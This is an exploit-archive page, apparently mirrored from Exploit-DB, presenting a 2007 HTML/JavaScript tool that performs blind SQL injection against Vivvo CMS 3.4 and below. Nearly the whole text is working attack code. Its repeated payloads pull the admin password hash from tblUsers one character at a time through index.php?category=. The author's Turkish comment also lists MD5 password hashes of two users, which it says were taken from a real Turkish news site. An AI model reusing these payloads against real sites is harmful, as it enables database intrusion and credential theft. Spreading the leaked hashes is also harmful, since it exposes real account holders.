- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4192
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3939
- Дата публикации
- 2007-07-18
HTML:
<html>
<head>
<title>Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</title>
<script type="text/javascript">
//'===============================================================================================
//'[Script Name: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.vivvo.net/
//'[$$ : $ 195
//'[Using : Write Target after Submit Click
//'[TR : \* 3 aydir beklettigim acigi artiq yayinlayayim dedim yontemi anlama
yablirsiniz exp biraz karisiktir ayrýyeten zamanýnda bu acigi denediðim
bir turk sitesi olan heykhaberden aldiim 1. ve 2. uyenin md5leri;
UserID:1 // 473a0029306b7435bed66350a16fcca8
UserId:2 // f4f532fa737f55a4d54bf20c2d70d331
/*
//'===============================================================================================
function nesneyarat() {
var nesne;
var tarayici = navigator.appName;
if(tarayici == "Microsoft Internet Explorer"){
nesne = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
nesne = new XMLHttpRequest();
}
return nesne;
}
var http = nesneyarat();
function islemlink(adresyolla,charyolla) {
genreidim=document.getElementById('genreid').value
file="/index.php?category=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim
http.open('get', adres);
http.onreadystatechange = cevapFonksiyonu;
http.send(null);
}
function cevapFonksiyonu() {
if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();
}
}
function yonlendir() {
if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=49)/*');
document.getElementById('buton').value = "Test Character(2)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(2)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=50)/*');
document.getElementById('buton').value = "Test Character(3)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(3)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=51)/*');
document.getElementById('buton').value = "Test Character(4)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(4)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=52)/*');
document.getElementById('buton').value = "Test Character(5)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(5)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=53)/*');
document.getElementById('buton').value = "Test Character(6)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(6)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=54)/*');
document.getElementById('buton').value = "Test Character(7)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(7)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=55)/*');
document.getElementById('buton').value = "Test Character(8)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(8)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=56)/*');
document.getElementById('buton').value = "Test Character(9)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(9)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=57)/*');
document.getElementById('buton').value = "Test Character(a)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(a)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=97)/*');
document.getElementById('buton').value = "Test Character(b)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(b)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=98)/*');
document.getElementById('buton').value = "Test Character(c)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(c)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=99)/*');
document.getElementById('buton').value = "Test Character(d)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(d)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=100)/*');
document.getElementById('buton').value = "Test Character(e)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(e)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=101)/*');
document.getElementById('buton').value = "Test Character(f)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(f)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=102)/*');
document.getElementById('buton').value = "Finished"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</font></b></p>
<p></p>
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2"> </font></b>
<input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
<b><font face="Arial" size="1" color="#FF0000"> Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath] </font></b>
<input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
<p>
<b><font face="Arial" size="1" color="#FF0000"> Character:</font><font face="Arial" size="1" color="#808080">[Md5
Character 1-32] </font></b>
<input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p>
<b><font face="Arial" size="1" color="#FF0000">Category Id:</font><font face="Arial" size="1" color="#808080">[index.php?category=] </font></b>
<input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br>
<p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>
</body>
</html>
# milw0rm.com [2007-07-18]
- Источник
- www.exploit-db.com